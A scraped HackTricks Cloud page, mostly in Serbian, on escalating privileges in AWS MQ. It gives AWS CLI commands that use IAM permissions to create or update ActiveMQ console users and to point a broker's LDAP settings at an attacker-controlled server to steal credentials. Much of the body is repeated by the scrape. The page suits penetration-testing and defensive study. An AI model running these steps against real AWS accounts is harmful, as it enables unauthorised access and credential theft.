AWS - MQ Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

MQ

Za više informacija o MQ proverite:

AWS - MQ Enum

`mq:ListBrokers`, `mq:CreateUser`

Sa tim dozvolama možete napraviti novog korisnika u ActimeMQ brokeru (ovo ne funkcioniše u RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama navigacijom kroz ActiveMQ

`mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`

Sa tim dozvolama možete napraviti novog korisnika u ActiveMQ brokeru (ovo ne funkcioniše u RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama navigacijom kroz ActiveMQ

`mq:ListBrokers`, `mq:UpdateBroker`

Ako broker koristi LDAP za autorizaciju sa ActiveMQ. Moguće je promeniti konfiguraciju LDAP servera koji se koristi na onaj koji kontroliše napadač. Na ovaj način napadač će moći da ukrade sve kredencijale koji se šalju putem LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Ako biste nekako mogli pronaći originalne akreditive korišćene od strane ActiveMQ, mogli biste izvesti MitM, ukrasti akreditive, koristiti ih na originalnom serveru i poslati odgovor (možda samo ponovnim korišćenjem ukradenih akreditiva mogli biste to uraditi).

Potencijalni uticaj: Ukrasti ActiveMQ akreditive

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousAWS - Mediapackage Privesc NextAWS - MSK Privesc

Last updated 3 days ago

Za više informacija o MQ proverite:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Sa tim dozvolama možete napraviti novog korisnika u ActimeMQ brokeru (ovo ne funkcioniše u RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama navigacijom kroz ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Sa tim dozvolama možete napraviti novog korisnika u ActiveMQ brokeru (ovo ne funkcioniše u RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama navigacijom kroz ActiveMQ

mq:ListBrokers, mq:UpdateBroker

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Potencijalni uticaj: Ukrasti ActiveMQ akreditive

MQ

mq:ListBrokers, mq:CreateUser

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

mq:ListBrokers, mq:UpdateBroker

MQ

mq:ListBrokers, mq:CreateUser

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

mq:ListBrokers, mq:UpdateBroker

`mq:ListBrokers`, `mq:CreateUser`

`mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`

`mq:ListBrokers`, `mq:UpdateBroker`

`mq:ListBrokers`, `mq:CreateUser`

`mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`

`mq:ListBrokers`, `mq:UpdateBroker`